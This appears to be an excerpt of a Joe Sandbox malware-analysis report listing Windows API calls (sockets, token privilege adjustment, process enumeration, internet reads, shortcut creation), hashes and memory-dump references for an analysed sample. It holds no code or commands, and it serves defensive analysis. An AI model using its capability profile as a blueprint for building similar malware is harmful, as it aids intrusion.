                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ColorProc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 3744519093-0
                                                                    • Opcode ID: 9a80bc3b4dda5667b2163f51b4672ddfcdd6ce2b215db735a534f16034374798
                                                                    • Instruction ID: c8fe93895bf1cf6cc43cbf42efc0cb6bdd9aa7b595750263fb52e71b9cee70a1
                                                                    • Opcode Fuzzy Hash: 9a80bc3b4dda5667b2163f51b4672ddfcdd6ce2b215db735a534f16034374798
                                                                    • Instruction Fuzzy Hash: F5A13772106546BAF735AA298C58EBF399EFB42351F1C020BF582D53C5C9298D41B3B2
                                                                    APIs
                                                                      • Part of subcall function 01047D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0104679E
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010467C7
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 01046800
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0104680D
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 01046821
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 99427753-0
                                                                    • Opcode ID: 4287864cd2b2693039bb09a9fa8532c0fc35cdb243be95a1f04b345346ee6e7b
                                                                    • Instruction ID: 0f03efba4df27caa18da0ad33785a3a0cb12e1b696646227a94b83e560567582
                                                                    • Opcode Fuzzy Hash: 4287864cd2b2693039bb09a9fa8532c0fc35cdb243be95a1f04b345346ee6e7b
                                                                    • Instruction Fuzzy Hash: EB41E375A002106FEB10BF68CC86F7E77EAAF05B10F48845DF955AB3C2DA789D019791
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: e55a460d8bd0a7df519ebff1d8271ef5af391aabc3f9b62f0173810ec4518fa7
                                                                    • Instruction ID: 5fc21f258dfcfdd1f341a6be8bcc1e88c33e4e722c4fdf7f7734962eaa956404
                                                                    • Opcode Fuzzy Hash: e55a460d8bd0a7df519ebff1d8271ef5af391aabc3f9b62f0173810ec4518fa7
                                                                    • Instruction Fuzzy Hash: 2911E231300211ABEB616F2ADC48A6F7BDDEF44760F448069EDC9D3242CBB898018AA0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01028121
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0102812B
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0102813A
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01028141
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01028157
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: aaaaa121cb743bbf8944a61e3a87ff12a66ece0039e20c82b5e32e8c0c8caa26
                                                                    • Instruction ID: 96366769b90b7b7d8007f85e5c1e22cad9b135eb0ff358ce014e8752e1834f19
                                                                    • Opcode Fuzzy Hash: aaaaa121cb743bbf8944a61e3a87ff12a66ece0039e20c82b5e32e8c0c8caa26
                                                                    • Instruction Fuzzy Hash: 97F0C274201325AFEB611FA8EC8DE6B3BECFF4A654B104056F9C5C3180DB6A9800DB60
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0103C432
                                                                    • CoCreateInstance.OLE32(01062D6C,00000000,00000001,01062BDC,?), ref: 0103C44A
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • CoUninitialize.OLE32 ref: 0103C6B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                    • String ID: .lnk
                                                                    • API String ID: 2683427295-24824748
                                                                    • Opcode ID: 7f6e9a6a5d3449d677d8a8b88e29ad0adc5e5a941ad98417e50613650c5ce81d
                                                                    • Instruction ID: 7e46d2581a6369262fde8415c12ed9cc94ae2b9ab52ecec525e85a3cb526cd8f
                                                                    • Opcode Fuzzy Hash: 7f6e9a6a5d3449d677d8a8b88e29ad0adc5e5a941ad98417e50613650c5ce81d
                                                                    • Instruction Fuzzy Hash: E3A15A71108205AFD300EF54CC81EABB7EDEF88744F04491EF1959B291EBB5E909DB52
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4AD0), ref: 00FD4B45
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FD4B57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: a25ae9c3c181fe83110fda6ccfc049760857f369f32de18719e1c1da1967d03a
                                                                    • Instruction ID: fed0ca14145defcf048eaf2234063fd2ac7c0dd97cbe567166913f4322a62fa0
                                                                    • Opcode Fuzzy Hash: a25ae9c3c181fe83110fda6ccfc049760857f369f32de18719e1c1da1967d03a
                                                                    • Instruction Fuzzy Hash: E8D01234A10713CFD7209F32D828B0776D5AF56251B15882F98C5DA200E678E880C758
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 674341424-0
                                                                    • Opcode ID: 40200185d801a7cc30a7d33d20a96e4265772bcbcaa5672375013cfc1165f63b
                                                                    • Instruction ID: bc02510d84b3bff6f693666802c88f1639f0ebd01c0fdd861e312acba81bf063
                                                                    • Opcode Fuzzy Hash: 40200185d801a7cc30a7d33d20a96e4265772bcbcaa5672375013cfc1165f63b
                                                                    • Instruction Fuzzy Hash: E422DD71A083419FC724DF24C884BAFB7E5AF84710F04492DF99A97391DB79EA04DB92
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0104EE3D
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0104EE4B
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0104EF0B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0104EF1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                    • String ID:
                                                                    • API String ID: 2576544623-0
                                                                    • Opcode ID: 8dbe9fac0a76723e2da0dbffde4137d2250cefefcb46ce9e14d2314c2dfb22fa
                                                                    • Instruction ID: 7a3144a45852bddffdbd2157446b66afb87c3e0227b25ec1240ba7db90f0a67f
                                                                    • Opcode Fuzzy Hash: 8dbe9fac0a76723e2da0dbffde4137d2250cefefcb46ce9e14d2314c2dfb22fa
                                                                    • Instruction Fuzzy Hash: 5C517BB1508301ABD320EF24DC81E6BB7E9EF84750F44482EF595972A1EB74E908DB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID:
                                                                    • API String ID: 3964851224-0
                                                                    • Opcode ID: 77420364da6cea1d486a3f53861121f8ddbe26db8dcd3417a7b0c66731c0284b
                                                                    • Instruction ID: d4ef04e444600d31430e827141073362f5d4344bec72871803f5d368b96d4529
                                                                    • Opcode Fuzzy Hash: 77420364da6cea1d486a3f53861121f8ddbe26db8dcd3417a7b0c66731c0284b
                                                                    • Instruction Fuzzy Hash: 14928171508381CFD720DF15C480B2AB7E1BF85314F14896DE98A9B362DBB9EC85DB92
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0102E628
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 3218906ae04237c8b60d4936964b992eb00af1068e29fc385052c7de2c54c47c
                                                                    • Instruction ID: 7a426954a07be8b3c23d5eefe1e51b7272e14680edc472abda852abcaa74233d
                                                                    • Opcode Fuzzy Hash: 3218906ae04237c8b60d4936964b992eb00af1068e29fc385052c7de2c54c47c
                                                                    • Instruction Fuzzy Hash: 44323775A407159FDB28CF19C4819AAB7F0FF48310B15C4AEE99ADB3A2D770E941CB40
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0104180A,00000000), ref: 010423E1
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01042418
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: cf6bdbf56e7c631b84cef3944a68d9826ad00d94baa23d1245a2fe30bf2d6ea1
                                                                    • Instruction ID: 1b926e4df9211b6123c73aa1bc108d10282c6c500749f192addf23d1045ab83a
                                                                    • Opcode Fuzzy Hash: cf6bdbf56e7c631b84cef3944a68d9826ad00d94baa23d1245a2fe30bf2d6ea1
                                                                    • Instruction Fuzzy Hash: DF41A4B1A04209BFEB109E99ECC5EBFB7FCEB80715F00807AF781A6141DAB59E419650
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103B343
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0103B39D
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0103B3EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: 92977a4eb4a36396bf87323bf2e5f36c6e0ca1be3c359d5a1050c9ec6595bc5b
                                                                    • Instruction ID: bd6851435575aefeb1798e74af02ead1ba998216bc287b299cdc17219480ff68
                                                                    • Opcode Fuzzy Hash: 92977a4eb4a36396bf87323bf2e5f36c6e0ca1be3c359d5a1050c9ec6595bc5b
                                                                    • Instruction Fuzzy Hash: 64217135A00218EFCB00EFA5D880AEEFBB9FF49314F0480AAE945EB355CB359915DB51
                                                                    APIs
                                                                      • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                      • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
                                                                    • GetLastError.KERNEL32 ref: 01028865
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: 484e28753a959cb8a4ddc72cf653fd1edfb1e3b3efd9a3fe248a183a56ddeef2
                                                                    • Instruction ID: ae7efa3b15e58490894ba9c3f0a02dff64789b7a8dd0a7c9daa7414e5b7f4ae1
                                                                    • Opcode Fuzzy Hash: 484e28753a959cb8a4ddc72cf653fd1edfb1e3b3efd9a3fe248a183a56ddeef2
                                                                    • Instruction Fuzzy Hash: FB119DB2804305AFE728DFA4EC85D6BB7E8EB04310B24C52EF49583251EB74B8008B60
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01028774
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0102878B
                                                                    • FreeSid.ADVAPI32(?), ref: 0102879B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 869cebc9c2b70708988e5deb585543d9fd08b3e574cc763d93e97b9cabcdbc57
                                                                    • Instruction ID: 193928c3ba55e00c6ad6a3354ec87e548d77a6ebaea82b09abf02809f9a5a632
                                                                    • Opcode Fuzzy Hash: 869cebc9c2b70708988e5deb585543d9fd08b3e574cc763d93e97b9cabcdbc57
                                                                    • Instruction Fuzzy Hash: 7DF04F7591130DBFDF04DFF4DC89AAEBBBCEF08211F0044A9A901E2180D6795A148B50
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0103C6FB
                                                                    • FindClose.KERNEL32(00000000), ref: 0103C72B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 3584c64584beccf86aa8feb79cc1653401b312c50c892d206b445b3ca0fb4502
                                                                    • Instruction ID: a82dc891111c0640c7139f0f19b84f3ad69985c4154a6db42873b3062c1184f9
                                                                    • Opcode Fuzzy Hash: 3584c64584beccf86aa8feb79cc1653401b312c50c892d206b445b3ca0fb4502
                                                                    • Instruction Fuzzy Hash: B911A1726042009FDB10EF29C844A2EF7E9FF85320F04851EF9A9D7391DB74A801DB81
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01049468,?,0105FB84,?), ref: 0103A097
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01049468,?,0105FB84,?), ref: 0103A0A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 6f6d9fb9dcb09f5054fb75d80c993f10b7917e24c3798e1f137f59175367b1da
                                                                    • Instruction ID: 2f155e299cfed1dd6262fa1a1996a267f4283fcc5ebb015c777c378d81b6bf1b
                                                                    • Opcode Fuzzy Hash: 6f6d9fb9dcb09f5054fb75d80c993f10b7917e24c3798e1f137f59175367b1da
                                                                    • Instruction Fuzzy Hash: 7AF0823520532EABDB21AEA4CC48FEA776DBF08361F008156F989D7181D6359540CBA1
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01028309), ref: 010281E0
                                                                    • CloseHandle.KERNEL32(?,?,01028309), ref: 010281F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 9c30fca3019eb79bc74c9ab88f5a5b709f6733969cb2bc2222b5e68bf242f2fe
                                                                    • Instruction ID: 7e779a6b59f09d755479e4ed2ea6f5c196c8d0990543a32f18f3c493e6aea104
                                                                    • Opcode Fuzzy Hash: 9c30fca3019eb79bc74c9ab88f5a5b709f6733969cb2bc2222b5e68bf242f2fe
                                                                    • Instruction Fuzzy Hash: BBE0E671011611AFF7252B64EC05D777BEDEF04310714C85DF99584475DB665C90DB10
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FF8D57,?,?,?,00000001), ref: 00FFA15A
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FFA163
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
